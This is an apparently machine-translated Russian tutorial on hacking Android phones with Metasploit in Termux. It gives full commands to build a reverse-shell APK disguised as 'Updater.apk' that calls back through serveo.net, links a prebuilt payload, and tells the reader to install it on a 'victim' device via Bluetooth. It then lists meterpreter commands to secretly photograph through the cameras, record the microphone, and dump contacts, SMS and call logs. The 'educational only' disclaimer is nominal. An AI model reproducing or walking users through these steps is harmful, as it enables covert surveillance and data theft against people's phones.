Привет
Хочу немного поиграть в стиле WATCH_DOGS H4cK1nG ... !!! тогда вы в нужном месте!
Вы можете назвать это как: "Android для Android Hacking". Этот метод работает на 100%, поэтому внимательно следуйте моему уроку, его действительно очень легко следовать (но немного сложно). Если у вас есть какие-либо ошибки или вы думаете, что я что-то упустил, сообщите мне в разделе «Комментарии» Я постараюсь лучше всего решить проблему.
ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Эта тема является O.N.L.Y для целей образования. Я не буду нести ответственность за любое негативное и незаконное использование этой информации. Старайтесь не взламывать Android, кроме ваших. Или вы будете в тюрьме. Используйте эту информацию только в целях тестирования или для впечатления ваших друзей.
Итак, начнем ...
Требования
1). Android 5.0 (или позже. Учебник для более старых версий будет опубликован в ближайшее время ...)
2). Android-приложение TermuX (загрузить из магазина Play)
3). Установленная Metasploit Framework в TermuX (учебное пособие здесь)
4). Активное интернет / WiFi соединение
5). TermuX должно быть разрешено использовать внешнее хранилище (для этого введите только эту команду сразу: "termux-setup-storage")
6). MiXplorer (для подписания APK-файла загрузите его с сайта UpToDown)
7). MiX Signer (APK Signer для MiXplorer, скачать его из магазина Play)
8). (Рекомендуется) Используйте Hacker`s Keyboard для простого ввода команд в TermuX.
Шаг 1Пересылка портов
Многие люди используют NGROK для переадресации портов. Но в NGROK вы можете увидеть, что он создаст новый домен или порт при повторном подключении к нему. Зарезервированный домен и порт, к сожалению, доступны только для платных или их премиум-клиентов. Вот почему для NGROK вы должны генерировать новый APK-файл каждый раз, когда начинаете взламывать.
НО ЗДЕСЬ ... мы будем использовать Serveo. В Serveo вы можете вручную переадресовать желаемый порт в Интернете (и можете пересылать его снова в будущем). Чтобы использовать переадресацию портов Serveo, вы должны установить пакет OpenSSH для TermuX. Для этого введите эту команду в TermuX:
pkg установить openssh
- Он успешно установит OpenSSH
После установки просто введите это:
ssh -R (Desired_Port): localhost: (Desired_Port) serveo.net
- Подробности ниже
Он может спросить вас о ssh по умолчанию или что-то вроде этого. Просто введите «да», когда он спросит об этом.
Здесь вы должны помнить некоторые моменты; Если вы хотите перенаправить порт HTTP, затем выберите разные порты в обоих полях «Desired_Port». Но здесь мы будем перенаправлять порт TCP. Для пересылки TCP-порта вы должны ввести те же, желаемые порты в поле «Desired_Ports». Также не меняйте "localhost". Здесь мы собираемся переслать порт TCP: 4564 (только для примера). После переадресации порт может выглядеть так:
(Необязательно) Назовите этот сеанс: Переадресация портов
Шаг 2 Создание APK-файла со встроенной полезной нагрузкой
Чтобы создать APK-файл со встроенной полезной нагрузкой, введите эту команду в NEW SESSION:
msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = 4564 R
> Хранение / Загрузки / Updater.apk
- Ссылка на Updater.apk находится в следующем третьем абзаце
Подождите минуту ...
Хорошо ... Теперь файл APK с встроенной полезной нагрузкой успешно генерируется здесь: Хранение телефона / SD-карты -> Загрузки -> Updater.apk
(ДОПОЛНИТЕЛЬНО) Вы можете использовать APK Editor Pro, чтобы изменить имя (по умолчанию: MainActivity) и версию созданного APK-файла.
Примечание: - Если вы не можете создать APK-файл, скачайте его отсюда:
mega.nz/#!uo9wSQRA!7_TqR8JqY_NJWZADNNZYEiBL1Imh1PvSrtK216m6uBc
(Помните: этот APK-файл не подписан! Вы должны подписать его перед использованием, чтобы избежать проблем).
Шаг 3: Подписание недавно сгенерированного файла APK
Чтобы подписать недавно созданный файл APK,
Откройте диспетчер файлов MiXplorer и перейдите к «Un-Signed APK File (Updater.apk)» (будет находиться в папке загрузок).
Длительное нажатие на «Un-Signed APK File (Updater.apk)» и выберите «кнопку МЕНЮ» в верхнем правом углу MiXplorer, затем выберите «SIGN».
Он будет отображать различные варианты подписи APK-файла (но предпочтительнее «AUTO»).
Выберите «АВТО», чтобы автоматически и успешно подписать файл APK.
Теперь ваш APK-файл: (имя файла) -signed.apk успешно подписан и полностью функционален и имеет размер 9,9 КБ.
Для получения дополнительной информации о подписании apk-файла посетите мой учебник: Подпишите APK-файл с помощью встроенной полезной нагрузки (The Ultimate Guide)
Шаг 4 Настройка Metasploit в TermuX
Активируйте Metasploit Framework в TermuX, введя эту команду в новом сеансе:
msfconsole
- Metasploit Framework Console
Примечание (1): - Если вы еще не установили Metasploit-Framework в своем приложении TermuX, следуйте этому руководству: Установите Metasploit Framework в TermuX на Android
Примечание (2): - Если вы получаете эту ошибку: Не удалось подключиться к базе данных, как показано на снимке экрана ниже, введите следующие команды в НОВУЮ СЕССИЮ (К сожалению, вам может понадобиться вводить эти команды каждый раз, когда вы открываете TermuX (в отдельная сессия). Но, к счастью, ввод таких (следующих) команд не повлияет на ваш взлом! Вот почему я игнорирую эту ошибку :)
mkdir -p $ PREFIX / var / lib / postgresql
initdb $ PREFIX / var / lib / postgresql
pg_ctl -D $ PREFIX / var / lib / postgresql start
- Спасибо DUST WORLD, за это исправление ... !!!
Подождите минутку ...
Теперь, когда msfconsole запускается, наберите следующие (полужирные) команды одну за другой внимательно:
msf> использовать эксплойт / multi / handler
msf> установить полезную нагрузку android / meterpreter / reverse_tcp
msf> установить LHOST localhost
msf> установить LPORT 4564
msf> эксплуатировать -j -z
- вводите только жирные команды
Шаг 5. Установка APK в Android-устройстве жертвы.
Теперь отправьте файл Payload-Signed.apk на устройство Android вашей жертвы (например, рекомендуется через Bluetooth) -> Установите его -> затем откройте его (убедитесь, что устройство жертвы имеет активное подключение к Интернету).
После открытия APK-файла на телефоне жертвы вы увидите, что Meterpreter Session в вашем поле Metasploit будет активирован. Чтобы открыть сеанс Meterpreter на устройстве жертвы, нажмите «Кнопка возврата» и введите эту команду в сеансе Metasploit:
сеансы -i (идентификатор сессии)
- (ID сеанса) = 1, 2, 3, 4 или 5 ...
В (ID сеанса) выберите номер сеанса Meterpreter (т.е. вы увидите это сообщение, когда ваша жертва откроет файл APK: Meterpreter Session Opened 1, здесь 1 - идентификатор сеанса Meterpreter Session).
Если вы видите следующее окно, то
БИНГО.......!!!!!!!! Вы успешно взломали Android-устройство жертвы
!!! ... нужна помощь во время взлома ... ???
Вы можете ввести: команду {meterpreter> help}, для всех доступных команд, здесь я упростил некоторые команды для вас.
Принимая Стелс Снимок с передней камеры
Просто введите эту команду для этого:
webcam_snap -i 2 -p хранилище / загрузки / X-Stealth-Snapshot-F.jpg
Здесь в этой команде 2 представляет фронтальную камеру. Для задней камеры мы будем использовать 1.
Ваш Stealth Snapshot можно найти здесь: (хранилище записи по умолчанию) -> загрузки -> X-Stealth-Snapshot-F.jpg
Снимок Stealth с задней камеры
Как и выше, но на этот раз мы будем использовать 1,
webcam_snap -i 1 -p хранилище / загрузки / X-Stealth-Snapshot-R.jpg
Ваш Stealth Snapshot можно найти здесь: (хранилище записи по умолчанию) -> загрузки -> X-Stealth-Snapshot-R.jpg
Получение всех контактов
Чтобы получить контакты, просто введите эту команду:
dump_contacts -o хранилище / загрузки / X-Contacts.txt
Conacts будут сохранены в: (хранилище записи по умолчанию) -> загрузки -> X-Contacts.txt
Загрузка всех SMS
Как и выше,
dump_sms -o хранилище / загрузки / X-SMS.txt
Все SMS будут сохранены в: (хранилище записи по умолчанию) -> загрузки -> X-SMS.txt
Получение журнала вызовов
Просто введите это:
dump_calllog -o хранилище / загрузки / X-CallLog.txt
Журнал вызовов будет сохранен в: (хранилище записи по умолчанию) -> загрузки -> X-CallLog.txt
Подглядывание через микрофон
Здесь вы должны отредактировать длительность записи микрофона (по умолчанию: 1 с). Команда на 10 секунд записи выглядит так:
record_mic -d 10 -f хранилище / загрузки / X-Spy-Record.mp3
Шпионская запись будет сохранена в: (хранилище записи по умолчанию) -> загрузки -> X-Spy-Record.mp3
??? ... Общие проблемы ... ???
Metasploit не работает на TermuX
Это может произойти, если вы делаете что-то не так при установке TermuX на Android. Если вы видите ошибку, такую как GEMS, не найдена, или любую другую ошибку такого рода, просто удалите TermuX с его данными и переустановите.
msfvenom / msfconsole: команда не найдена!
Есть две возможные причины этой ошибки.
1). Metasploit неправильно установлен на TermuX. Поэтому не удалось создать командный ярлык. Чтобы это исправить, удалите TermuX с данными. Затем переустановите TermuX и повторите все методы снова. Это на самом деле ошибка скрипта. Я также столкнулся с этой проблемой при первой установке Metasploit в TermuX!
2). Metasploit успешно установлен, но не смог создать ярлык. Для этого просто введите:
Ручной путь
Просто откройте новый сеанс и перейдите в каталог metasploit-framework, и введите команду ./msfconsole, Like This (то же самое для msfvenom):
cd metasploit-framework
./msfconsole
ИЛИ ЖЕ
./msfvenom
- 1-я команда займет U 2 в каталоге MSF, а 2-я - 2 в начале MSF.
2). Ярлык метод
Те люди, которые не удовлетворены первым и хотят создать команду быстрого доступа, как и другие программы, вводят следующие команды по одному в новом сеансе (включая msfvenom):
ln -s /data/data/com.termux/files/home/metasploit-framework/msfconsole
mv msfconsole $ PREFIX / bin
ln -s /data/data/com.termux/files/home/metasploit-framework/msfvenom
mv msfvenom $ PREFIX / bin
- Этот процесс также называется Symlinking [Обновлено]
3). Еще не повезло (с мсфвеном) !? Я загрузил Updater.apk с настройками по умолчанию (LHOST = serveo.net, LPORT = 4564). Загрузите это оттуда.
Почему мы используем serveo.net ...?
Как я уже говорил, NGROK не поддерживает фиксированный домен и порт. Итак, вы должны сгенерировать новый файл APK, когда вы планируете взломать телефон, вы взломали раньше. Посмотрите, что сервео говорит о NGROK:
Почему мы используем MiXplorer для подписания файла APK ...?
На самом деле, нет другого способа подписать APK-файл на Android. В противном случае, вы должны подписать файл APP на вашем компьютере (особенно в Kali LinuX).
MiXplorer - это отличный способ подписать APK-файл прямо в Android.
Ошибка Metasploit: не удалось подключиться к базе данных
Не беспокойся об этом. Мы уже сделали решение для этого :). Я думаю, что вы заметили ранее, что я использовал "localhost" вместо 127.0.0.1 или ::: 0: 1 в качестве HOST. На самом деле, команда «localhost» автоматически соединяет вас с доступным локальным хостом, независимо от того, является ли он 127.0.0.1 или ::: 0.1 или другим.
Но если вы все еще хотите это исправить, введите в New Session of TermuX следующие команды:
mkdir -p $ PREFIX / var / lib / postgresql
initdb $ PREFIX / var / lib / postgresql
pg_ctl -D $ PREFIX / var / lib / postgresql start
- Спасибо Dusty World за этот FIX
Какой телефон Android лучше всего подходит для целей H4ck1nG ...?
1). Телефоны / планшеты Google NeXuS отлично подходят для целей Hack1nG. Так как они полностью поддерживают Kali NetHunter. NetHunter включает в себя все инструменты для взлома и работает как Android / Windows на планшете.
2). Но если говорить об Android, многие H4ck3R говорят, что Samsung Galaxy S5 отлично подходит для целей Ha4ck1nG. Он имеет хорошую версию Android (около 5.0), а также полностью поддерживает приложение TermuX.
Заметка:-
Эта информация только для образовательных целей. Я не буду нести ответственность за негативное или незаконное использование этой информации. Кроме того, если вы столкнулись с какими-либо ошибками или считаете, что я что-то упустил, сообщите мне об этом в разделе комментариев. Я найду подходящее решение для этого. В любом случае, просто используйте эти трюки для удовольствия ... Не для выполнения незаконной работы. Мы все этические H4ck3Rs, и никогда не вторгаемся в тайны людей.